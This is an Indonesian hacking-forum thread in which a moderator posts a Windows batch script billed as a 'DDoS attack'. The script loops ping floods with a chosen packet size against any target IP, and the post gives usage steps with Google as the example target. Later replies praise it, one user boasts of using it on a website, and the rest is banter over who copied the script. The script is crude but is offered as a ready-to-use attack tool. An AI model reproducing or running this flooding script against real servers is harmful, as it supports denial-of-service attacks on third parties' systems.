Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 membuat serangan DDOS dari notepad

View previous topic View next topic Go down 
AuthorMessage
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 1:20 pm

---------------
Tahap pembuatan
---------------

Yang di perlukan dalam pembuatan ini adalah
1.Notepad

2.salin script ini ke notepad
Code:
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.


set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ​ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3.save dengan ekstensi batchfile
contoh:DDOS.bat

----------
Cara Pakai
----------

Pada menu Server-Target masukan
alamat web yang ingin di DDOS
contohnya seperti ini:
[You must be registered and logged in to see this image.]

disini penulis mencoba men DDOS Google,setalah itu
tekan "ENTER" hasil seperti ini
[You must be registered and logged in to see this image.]

kemudian masukan hasil ip dari ping tadi di ip host dan
untuk Packet Size itu untuk mengirim berapa byte jadi
ukuran Size terserah anda
contohnya seperti ini
[You must be registered and logged in to see this image.]

ke mudian tekan "ENTER" hasil seperti ini
[You must be registered and logged in to see this image.]

jika seperti gambar di atas berarti Proses DDOS berhasil di jalankan
tergantung anda ingin men DDOS sampai berapa lama.

Penulis asli : sohai king king

NB : Jangan disalahgunakan cuk ! hehhe...

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
Portgaz_D*Ace
Warga Lama
Warga Lama


Jumlah posting : 212
Join date : 2011-06-03
Lokasi : Depok-Sawangan

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 1:38 pm

wih wih abang RieqyNS13 makin jago ajah nih
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 1:49 pm

slow aja cuk ane buat cuman test doank hahah ~KIDDING,,lanjutan dari NB:jangan sampe disalahgunakan cuk,wkwkwk

nice gan,,ane DDoS web,1000000000000000,,lemot nya

mudah mudahan tar bisa bikin Pembuat Shell.html dari notepad Amin

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
agai132
Bupati
Bupati


Jumlah posting : 609
Join date : 2011-01-27
Age : 101
Lokasi : Depadn Monitor

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 1:50 pm

ada vierus nya gak gan,,,????

_________________
Read This Before Posting


[You must be registered and logged in to see this image.]


[center]cheat PB Terupdate

Cara buat PP kayak saya klik ini sini sini sini [You must be registered and logged in to see this image.]

Follow My blog For Updates Cheat , , , Klik Here


Joki NS terpercaya
Back to top Go down
Portgaz_D*Ace
Warga Lama
Warga Lama


Jumlah posting : 212
Join date : 2011-06-03
Lokasi : Depok-Sawangan

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 1:53 pm

agai132 wrote:
ada vierus nya gak gan,,,????
kayanya gk ada deh
Back to top Go down
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 2:08 pm

perasaan ini script yg tadi saya bahas sama Faiz dah
knpa nongol di sini ??

btw nice share lah
walaupun udh tau

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 2:26 pm

DreamStealer wrote:
perasaan ini script yg tadi saya bahas sama Faiz dah
knpa nongol di sini ??

btw nice share lah
walaupun udh tau
wkwkwk bisa kebetulan gan cheers

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
PandyakaA
Warga Lama
Warga Lama


Jumlah posting : 88
Join date : 2011-04-01

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 2:39 pm

ini ngambil dari HackerNewbie ya?
nice share lah .
meskipun ane udah tau .. haha
tp kemungkinan ngefek dari DDoS dari notepad cuma = 1 : 85
emang tulisannya banyak
tp butuh temen juga buat bantai server .
Back to top Go down
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 2:45 pm

Kurohige wrote:
DreamStealer wrote:
perasaan ini script yg tadi saya bahas sama Faiz dah
knpa nongol di sini ??

btw nice share lah
walaupun udh tau [You must be registered and logged in to see this image.]
wkwkwk bisa kebetulan gan [You must be registered and logged in to see this image.] cheers
iya juga sih
tapi scriptnya 100% mirip
dan yg saya bingung knpa si TS baru share sekarang
pass bgt sama pas kita chat O.O

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 2:59 pm

DreamStealer wrote:
Kurohige wrote:
wkwkwk bisa kebetulan gan [You must be registered and logged in to see this image.] cheers
iya juga sih
tapi scriptnya 100% mirip
dan yg saya bingung knpa si TS baru share sekarang
pass bgt sama pas kita chat O.O
ane curiga nih gan,,kau ngambil scriptnya lama bgt,,maksudnya kirim scriptnya ke aku,,wkwkwk jangan jangan C*P*S ya? wkwkwk

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
RieqyNS13
Moderator
Moderator


Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 4:02 pm

Penulis Aslinya punya nama samaran Sohai....ane sbenarnya mw nunggu orang untuk ngeshare kaya gini di cmonhack..tpi ane tunggu ga' da orang pun yg ngeshare,makannya ane cari di HN community

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 4:59 pm

Kurohige wrote:
ne curiga nih gan,,kau ngambil scriptnya lama bgt,,maksudnya kirim scriptnya ke aku,,wkwkwk jangan jangan C*P*S ya? wkwkwk [You must be registered and logged in to see this image.]
wkwkwk kedoknya akhirnya ketauan juga lol!

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 5:07 pm

DreamStealer wrote:
Kurohige wrote:
ne curiga nih gan,,kau ngambil scriptnya lama bgt,,maksudnya kirim scriptnya ke aku,,wkwkwk jangan jangan C*P*S ya? wkwkwk [You must be registered and logged in to see this image.]
wkwkwk kedoknya akhirnya ketauan juga lol!
jiakakaka ketahuan saat kau bilang LMFAO << LMFAO ane tahu artinya,, LMFAO=Laugh bla bla Floor bla bla bla Oh noo wkwkwk

disebut LMFAO(KETAWA BERBAHAK BAHAK)

RieqyNS13 wrote:
Penulis Aslinya punya nama samaran Sohai....ane sbenarnya mw nunggu orang untuk ngeshare kaya gini di cmonhack..tpi ane tunggu ga' da orang pun yg ngeshare,makannya ane cari di HN community
we kk wew,,nick mu apa di hacker newbie.forumid.net? ternyata kau juga gabung toh Smile

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
DreamStealer
Super Moderator
Super Moderator


Jumlah posting : 933
Join date : 2011-01-12
Age : 20
Lokasi : Antara ada dan tiada

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 5:09 pm

Kurohige wrote:
DreamStealer wrote:

wkwkwk kedoknya akhirnya ketauan juga lol!
jiakakaka ketahuan saat kau bilang LMFAO << LMFAO ane tahu artinya,, LMFAO=Laugh bla bla Floor bla bla bla Oh noo wkwkwk

disebut LMFAO(KETAWA BERBAHAK BAHAK)
bukan LMFAO
tapi LMAO -_- lol!

_________________
Gunakanlah apa yg kau punya dengan sebaik2nya dan jangan pernah menggunakan hal itu untuk merugikan orang lain !
If You Want To Add Me on
Want to ask something? just send [You must be registered and logged in to see this image.]


[You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]


Last edited by DreamStealer on Mon Aug 22, 2011 5:22 pm; edited 1 time in total
Back to top Go down
Crusher
Moderator
Moderator


Jumlah posting : 1158
Join date : 2011-04-26
Age : 103
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: membuat serangan DDOS dari notepad   Mon Aug 22, 2011 5:29 pm

DreamStealer wrote:
Kurohige wrote:
jiakakaka ketahuan saat kau bilang LMFAO << LMFAO ane tahu artinya,, LMFAO=Laugh bla bla Floor bla bla bla Oh noo wkwkwk

disebut LMFAO(KETAWA BERBAHAK BAHAK)
bukan LMFAO
tapi LMAO -_- lol!
maklum gan ane lupa -_-"

_________________
Gw tahu lo maho [You must be registered and logged in to see this image.]

yang sabar ya gan [You must be registered and logged in to see this image.]

jika belum sembuh silahkan Hubungi Operator Axis [You must be registered and logged in to see this image.]

Iklan ini di persembahkan oleh :

[You must be registered and logged in to see this image.]
Back to top Go down
Sponsored content




PostSubject: Re: membuat serangan DDOS dari notepad   Today at 1:05 pm

Back to top Go down
 
membuat serangan DDOS dari notepad
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Stop most DoS / DDoS attacks.
» Tipps und Tricks zu Win7
» All engines settings!!!
» Salam Muhibah Dari Singapura
» Pelaburan yang sah dari cermin mata BNM dan syariah - Cyber Trust Fund Corp

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Off Topic :: Chit - Chat-
Jump to: